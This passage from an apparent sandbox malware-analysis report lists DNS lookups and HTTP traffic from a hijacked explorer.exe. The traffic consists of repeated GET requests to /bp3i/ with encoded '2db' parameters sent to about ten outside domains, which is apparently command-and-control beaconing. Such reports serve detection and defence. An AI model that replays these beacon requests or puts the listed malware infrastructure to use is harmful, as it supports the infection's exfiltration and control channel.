                                                                                                                  Jun 22, 2021 18:26:33.086693048 CEST6144653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:33.159524918 CEST53614468.8.8.8192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Jun 22, 2021 18:25:05.819411039 CEST192.168.2.58.8.8.80x3bf8Standard query (0)www.reufhroir.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:10.909509897 CEST192.168.2.58.8.8.80xf2a2Standard query (0)www.purpleqube.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:16.629293919 CEST192.168.2.58.8.8.80x47b1Standard query (0)www.tori2020.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:22.827163935 CEST192.168.2.58.8.8.80x6b10Standard query (0)www.underce.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:28.505049944 CEST192.168.2.58.8.8.80x92eaStandard query (0)www.fredrika-stahl.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.726090908 CEST192.168.2.58.8.8.80xa6bfStandard query (0)www.doodstore.netA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:39.055846930 CEST192.168.2.58.8.8.80x732Standard query (0)www.kocaelimanliftkiralama.siteA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.382913113 CEST192.168.2.58.8.8.80x2986Standard query (0)www.mutanterestaurante.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:49.992361069 CEST192.168.2.58.8.8.80xf247Standard query (0)www.9wsc.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:55.564214945 CEST192.168.2.58.8.8.80x660Standard query (0)www.5xlsteve.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.782303095 CEST192.168.2.58.8.8.80x6b35Standard query (0)www.oceancollaborative.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.311050892 CEST192.168.2.58.8.8.80x7360Standard query (0)www.motivactivewear.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:11.586018085 CEST192.168.2.58.8.8.80x4f71Standard query (0)www.grpsexportsandimports.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:17.334999084 CEST192.168.2.58.8.8.80xaa31Standard query (0)www.kesat-ya10.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:27.430978060 CEST192.168.2.58.8.8.80x7483Standard query (0)www.shenghui118.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:33.086693048 CEST192.168.2.58.8.8.80x4106Standard query (0)www.reufhroir.comA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Jun 22, 2021 18:25:05.889704943 CEST8.8.8.8192.168.2.50x3bf8Name error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST8.8.8.8192.168.2.50xf2a2No error (0)www.purpleqube.compurpleqube.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST8.8.8.8192.168.2.50xf2a2No error (0)purpleqube.com119.81.95.146A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:17.239247084 CEST8.8.8.8192.168.2.50x47b1No error (0)www.tori2020.com222.239.248.209A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST8.8.8.8192.168.2.50x6b10No error (0)www.underce.comvallble01.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST8.8.8.8192.168.2.50x6b10No error (0)vallble01.xshoppy.shop75.2.124.199A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:28.584403992 CEST8.8.8.8192.168.2.50x92eaNo error (0)www.fredrika-stahl.com185.53.177.12A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)www.doodstore.netdoodstore.netCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)doodstore.net67.199.248.12A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)doodstore.net67.199.248.13A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:39.366209030 CEST8.8.8.8192.168.2.50x732Server failure (2)www.kocaelimanliftkiralama.sitenonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST8.8.8.8192.168.2.50x2986No error (0)www.mutanterestaurante.commutanterestaurante.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST8.8.8.8192.168.2.50x2986No error (0)mutanterestaurante.com50.87.146.99A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:50.063656092 CEST8.8.8.8192.168.2.50xf247No error (0)www.9wsc.com23.225.101.32A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:55.637794018 CEST8.8.8.8192.168.2.50x660No error (0)www.5xlsteve.com94.136.40.51A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST8.8.8.8192.168.2.50x6b35No error (0)www.oceancollaborative.comoceancollaborative.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST8.8.8.8192.168.2.50x6b35No error (0)oceancollaborative.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST8.8.8.8192.168.2.50x7360No error (0)www.motivactivewear.commotivactivewear.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST8.8.8.8192.168.2.50x7360No error (0)motivactivewear.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:11.956522942 CEST8.8.8.8192.168.2.50x4f71No error (0)www.grpsexportsandimports.com52.74.134.26A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:17.406371117 CEST8.8.8.8192.168.2.50xaa31Name error (3)www.kesat-ya10.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:27.493675947 CEST8.8.8.8192.168.2.50x7483No error (0)www.shenghui118.com45.192.104.89A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:33.159524918 CEST8.8.8.8192.168.2.50x4106Name error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.purpleqube.com
                                                                                                                  • www.tori2020.com
                                                                                                                  • www.underce.com
                                                                                                                  • www.fredrika-stahl.com
                                                                                                                  • www.doodstore.net
                                                                                                                  • www.mutanterestaurante.com
                                                                                                                  • www.9wsc.com
                                                                                                                  • www.5xlsteve.com
                                                                                                                  • www.oceancollaborative.com
                                                                                                                  • www.motivactivewear.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.549726119.81.95.14680C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:11.419150114 CEST1542OUTGET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.purpleqube.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:11.619210958 CEST1543INHTTP/1.1 302 Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:11 GMT
                                                                                                                  Server: Apache
                                                                                                                  Location: https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W
                                                                                                                  Content-Length: 308
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 75 72 70 6c 65 71 75 62 65 2e 63 6f 6d 2f 62 70 33 69 2f 3f 32 64 62 3d 49 6b 51 75 43 46 6c 37 4d 43 66 42 52 6a 2f 56 7a 2b 6f 39 53 5a 4b 75 34 7a 51 65 50 2b 35 48 51 4c 78 38 57 55 63 4a 62 65 56 6b 74 45 57 31 39 77 45 64 41 38 45 74 62 6d 72 68 35 31 65 54 44 59 59 4d 26 61 6d 70 3b 41 70 5a 78 3d 4f 32 4d 48 69 56 72 30 57 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&amp;ApZx=O2MHiVr0W">here</a>.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.549732222.239.248.20980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:17.506963015 CEST7114OUTGET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.tori2020.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:17.774080992 CEST7115INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:18 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 70 33 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.54973775.2.124.19980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:23.221652031 CEST9032OUTGET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.underce.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:23.498655081 CEST9034INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:23 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 166
                                                                                                                  Connection: close
                                                                                                                  Location: https://www.underce.com/bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.549743185.53.177.1280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:28.670067072 CEST9623OUTGET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.fredrika-stahl.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:28.712451935 CEST9624INHTTP/1.1 403 Forbidden
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.2.54974667.199.248.1280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:33.868663073 CEST9713OUTGET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.doodstore.net
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:34.017278910 CEST9714INHTTP/1.1 302 Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Set-Cookie: anon_u=cHN1X18wN2Y4NzA5Yi1jODFjLTRiMmMtYmZkNC05NTUzOGIxZWNiZTI=|1624379133|145dbdce4dcc0b7ea9e772ebe809527624e89d4e; Domain=bitly.com; expires=Sun, 19 Dec 2021 16:25:33 GMT; httponly; Path=/; secure
                                                                                                                  Strict-Transport-Security: max-age=1209600
                                                                                                                  Location: https://bitly.com/pages/landing/branded-short-domains-powered-by-bitly?bsd=doodstore.net
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  P3p: CP="CAO PSA OUR"
                                                                                                                  Via: 1.1 google
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  5192.168.2.54974950.87.146.9980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:44.760615110 CEST9748OUTGET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.mutanterestaurante.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:44.979393005 CEST9749INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:44 GMT
                                                                                                                  Server: Apache
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade, close
                                                                                                                  Last-Modified: Sat, 30 Nov 2019 02:37:20 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 746
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  6192.168.2.54975023.225.101.3280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:50.296525002 CEST9749OUTGET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.9wsc.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:50.530720949 CEST9750INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:43 GMT
                                                                                                                  Content-Length: 788
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: nginx
                                                                                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cf c3 c3 c5 c3 bf d0 d0 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  7192.168.2.54975194.136.40.5180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:55.696207047 CEST9752OUTGET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.5xlsteve.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:55.754239082 CEST9752INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:55 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 793
                                                                                                                  Connection: close
